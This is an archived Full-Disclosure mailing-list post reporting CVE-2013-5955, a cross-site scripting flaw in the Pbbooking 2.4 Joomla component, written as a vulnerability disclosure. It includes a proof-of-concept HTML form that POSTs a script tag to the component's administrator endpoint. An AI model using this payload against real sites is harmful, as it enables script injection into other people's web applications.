[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] [CVE-2013-5955] Cross-site scripting Vulnerability in the Pbbooking 2.4

To: "full-disclosure@xxxxxxxxxxxxxxxxx" <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] [CVE-2013-5955] Cross-site scripting Vulnerability in the Pbbooking 2.4
From: Mahmoud Ghorbanzadeh <mdgh9@xxxxxxxxx>
Date: Sat, 15 Mar 2014 03:46:39 -0700 (PDT)

Hello,

Cross-site
scripting (XSS) vulnerability in the Pbbooking 2.4 component
for Joomla! allows remote attackers to inject arbitrary web script or HTML via 
POST request to manage.php.

POC:
<form 
action="http://site/joomla/administrator/index.php?option=com_pbbooking&controller=manage&task=edit";
method="post">
    <input
type="text" name="id" value="1" />
    <input
type="text" name="date" value="1" />
              <input type="text"
name="xss" value="<script>alert('XSS')</script>"
/>
  <input
type="submit" name="submit2" value="Submit" />
</form>

Best regards.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Google vulnerabilities with PoC
Next by Date: [Full-disclosure] [CVE-2013-5954] Multiple Cross Site Request Forgery Vulnerabilities in OpenX 2.8.11
Previous by thread: Re: [Full-disclosure] XSS Vulnerability in the Youtube Gallery 3.4.0 Component
Next by thread: [Full-disclosure] [CVE-2013-5954] Multiple Cross Site Request Forgery Vulnerabilities in OpenX 2.8.11
Index(es):
- Date
- Thread